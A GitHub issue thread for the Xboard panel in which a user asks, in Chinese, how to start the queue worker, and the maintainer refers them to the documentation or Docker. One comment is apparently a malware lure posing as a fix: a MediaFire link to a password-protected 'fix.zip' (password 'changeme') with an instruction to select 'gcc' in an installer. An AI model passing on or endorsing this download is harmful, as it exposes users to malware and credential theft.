### ISSUE TITLE
[BUG]队列如何启动

### ISSUE THREAD

**Issue by lezi-fun** [cedar2025/Xboard#205]
🙇‍♂️🙇‍♂️🙇‍♂️注意：XrayR等非XBoard问题请前往项目方提问
🙇‍♂️🙇‍♂️🙇‍♂️Note: XrayR and other non-XBoard issues please go to the project side to ask questions

The XBoard version number you are using
当前使用的XBoard版本号(git commit id)
--------

Would you like to deploy using Docker?
你的部署方式（是否为Docker）
--------
宝塔面板

Please briefly describe the issue you encountered (preferably with reproducible steps).
简单描述你遇到的问题（最好带上复现步骤）
--------
不知道如何启动队列

Screenshot of the reported error(Please do desensitization)
报告错误的截图（请做脱敏处理）
--------

Screenshot of the reported error(Please do desensitization)
报告错误的截图（请做脱敏处理）
--------

![IMG_0148](https://github.com/user-attachments/assets/996f797e-5ad0-4d35-8a1c-abf3488f276f)

Run the php artisan log:export 7 command to export log files (where 7 represents logs for the last 7 days).
运行`php artisan log:export 7` 命令导出的日志文件(其中7为最近7天的日志)。
--------
[v2_logs_2024_08_28_135635.csv](https://github.com/user-attachments/files/16776992/v2_logs_2024_08_28_135635.csv)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cedar2025** [comment]
在文档中有开启的步骤， 如果你实在不会可以选择使用docker进行部署

**Comment by lezi-fun** [comment]
谢谢
